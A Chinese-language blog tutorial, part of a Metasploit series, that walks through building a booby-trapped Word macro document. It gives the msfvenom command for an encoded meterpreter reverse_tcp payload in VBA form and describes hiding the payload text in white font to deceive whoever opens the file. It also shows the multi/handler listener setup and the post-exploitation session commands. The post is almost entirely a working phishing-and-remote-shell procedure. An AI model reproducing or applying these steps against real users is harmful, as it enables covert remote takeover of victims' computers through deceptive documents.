Metasploit实例-宏漏洞(九)

2022年10月25日14:12:28 发表评论 93 views

1.1.1 使用office宏获取shell

1.1.1.1 生成宏后门

# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

Metasploit实例-宏漏洞(九)

Metasploit实例-宏漏洞(九)

1.1.1.2 制作带后门的宏文档

Metasploit实例-宏漏洞(九)

复制第一段代码到编辑器中:

Metasploit实例-宏漏洞(九)

复制第二段代码payload到word正文:

Metasploit实例-宏漏洞(九)

将字体设置为白色,增加迷惑性:

Metasploit实例-宏漏洞(九)

另存为启用宏的word文档:

Metasploit实例-宏漏洞(九)

1.1.1.3 启动msf监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/handler) > run –j

1.1.1.4 打开文档测试连接

Metasploit实例-宏漏洞(九)

msf6 exploit(multi/handler) > sessions

Metasploit实例-宏漏洞(九)

msf6 exploit(multi/handler) > sessions -i 1
# 查看后门进程
meterpreter > getpid
Current pid: 2224
meterpreter > ps

Metasploit实例-宏漏洞(九)

weinxin
我的微信
如果有技术上的问题可以扫一扫我的微信
版权声明
1. 本网站名称:Leon的博客
2. 本站永久网址:https://blog.leonshadow.cn
3. 本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ632113590进行删除处理。
4. 本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5. 本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6. 本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
liyang